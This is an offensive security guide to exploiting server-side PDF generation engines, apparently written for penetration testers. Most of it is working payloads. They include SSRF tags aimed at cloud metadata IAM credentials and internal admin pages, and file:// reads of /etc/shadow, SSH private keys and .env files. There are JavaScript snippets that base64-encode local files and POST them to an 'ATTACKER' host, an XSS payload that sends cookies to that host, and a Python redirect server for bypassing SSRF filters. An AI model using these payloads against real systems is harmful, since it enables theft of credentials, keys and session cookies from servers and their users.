PDF Generation Vulnerabilities

What is the Attack Surface

Web applications that generate PDFs from user-controlled HTML (invoices, reports, certificates) use server-side rendering engines — often a headless browser or HTML-to-PDF library. These engines process HTML including JavaScript, external resources, and local file paths, making them powerful SSRF/LFI vectors.

Common libraries:

Library	Language	Notes
wkhtmltopdf	C++ (Qt/WebKit)	Runs JavaScript; most common SSRF target
DomPDF	PHP	Limited JS; supports CSS/HTML
mPDF	PHP	No JS; text-based
html2pdf	PHP/JS	Varies
PDFKit	Node.js	Wraps wkhtmltopdf
PD4ML	Java	Enterprise use
WeasyPrint	Python	CSS-focused

Detection

Step 1 — Identify PDF generation

Look for features that produce downloadable PDFs from user input:

Invoice generators
Report/export buttons
Certificate generators
Resume builders
Any form where your input appears in a PDF output

Step 2 — Fingerprint the library

Download a generated PDF and inspect its metadata:

exiftool invoice.pdf
pdfinfo invoice.pdf
strings invoice.pdf | grep -i "creator\|producer\|wkhtmltopdf\|dompdf"

Look for:

Creator:  wkhtmltopdf 0.12.6.1
Producer: Qt 4.8.7

Creator:  DomPDF 1.2.0
Producer: dompdf + CPDF

The library name and version tells you which exploits apply.

Step 3 — Test for SSRF with Burp Collaborator

Inject an external resource reference into any field that appears in the PDF:

<img src="http://COLLABORATOR_DOMAIN/ssrf_test"/>
<link rel="stylesheet" href="http://COLLABORATOR_DOMAIN/css_test">
<iframe src="http://COLLABORATOR_DOMAIN/iframe_test"></iframe>

If Burp Collaborator receives an HTTP/DNS ping → the PDF engine is fetching external resources → SSRF confirmed.

Exploit 1: SSRF via Resource Tags (wkhtmltopdf)

wkhtmltopdf uses WebKit which fetches all linked resources during rendering.

Image tag SSRF

<img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/">

The rendered PDF will contain the AWS IAM credentials as image load error text (or the raw JSON in some configurations).

iframe SSRF (reads the response body into the PDF)

<iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" 
        width="800" height="400"></iframe>

The iframe content renders inline in the PDF — cloud metadata appears directly in the document.

Internal service access

<iframe src="http://127.0.0.1:8080/admin"></iframe>
<iframe src="http://internal.company.local/api/users"></iframe>
<iframe src="http://10.0.0.1/router/admin"></iframe>

Exploit 2: LFI via file:// Protocol

wkhtmltopdf and some other engines support file:// URLs to read local files:

iframe file read

<iframe src="file:///etc/passwd" width="800" height="600"></iframe>
<iframe src="file:///etc/shadow"></iframe>
<iframe src="file:///root/.ssh/id_rsa"></iframe>
<iframe src="file:///var/www/html/.env"></iframe>
<iframe src="file:///proc/self/environ"></iframe>

object/embed tag

<object data="file:///etc/passwd"></object>
<embed src="file:///etc/passwd">

img src for binary detection

<img src="file:///etc/passwd">

Won’t render but a broken image placeholder appears — confirms file access.

Exploit 3: JavaScript-Based LFI (wkhtmltopdf / headless Chrome)

For engines that execute JavaScript:

<script>
var xhr = new XMLHttpRequest();
xhr.onload = function() {
    document.write('<pre>' + this.responseText + '</pre>');
};
xhr.open('GET', 'file:///etc/passwd', false);
xhr.send();
</script>

Or exfiltrate via an HTTP request (SSRF + LFI combined):

<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'file:///etc/passwd', false);
xhr.send();
var contents = xhr.responseText;

var exfil = new XMLHttpRequest();
exfil.open('POST', 'http://ATTACKER/collect', false);
exfil.send(btoa(contents));
</script>

Exploit 4: XSS Payload in PDF Context

If the PDF engine runs JavaScript and the output is rendered in a browser (via PDF.js or an embedded viewer), XSS in the PDF can execute in the viewer’s origin:

<script>alert(document.domain)</script>

Or inject into a form field that appears verbatim in the PDF:

"><script>fetch('http://ATTACKER/?c='+document.cookie)</script>

Exploit 5: Redirect-Based SSRF Bypass

If the PDF engine follows HTTP redirects, chain an open redirect to reach internal IPs:

<img src="https://TRUSTED_DOMAIN/redirect?url=http://169.254.169.254/latest/meta-data/">

Or host a redirect server:

# Python redirect server
python3 -c "
import http.server, urllib.request

class Redirect(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        self.send_header('Location','http://169.254.169.254/latest/meta-data/')
        self.end_headers()

http.server.HTTPServer(('0.0.0.0', 80), Redirect).serve_forever()
"

When the PDF is emailed or stored and you can’t see the content directly:

SSRF confirmation — Collaborator ping from any resource tag confirms the engine fetches URLs.

Exfiltrate via POST — JavaScript POST to your server (wkhtmltopdf only):

<script>
fetch('http://ATTACKER/lfi', {
  method: 'POST',
  body: (function(){var x=new XMLHttpRequest();x.open('GET','file:///etc/passwd',false);x.send();return btoa(x.responseText);})()
});
</script>

Timing — SSRF to a slow endpoint produces a delayed PDF generation response.

Burp Suite workflow

Proxy — intercept the PDF generation request; find user-controlled fields.
Repeater — inject <img src="http://COLLABORATOR"> into each field; check Collaborator for callbacks.
For LFI: inject <iframe src="file:///etc/passwd"> and download/inspect the PDF output.
Collaborator — confirm SSRF and use as exfiltration endpoint for blind scenarios.
Decoder — base64-decode any exfiltrated file contents from Collaborator HTTP requests.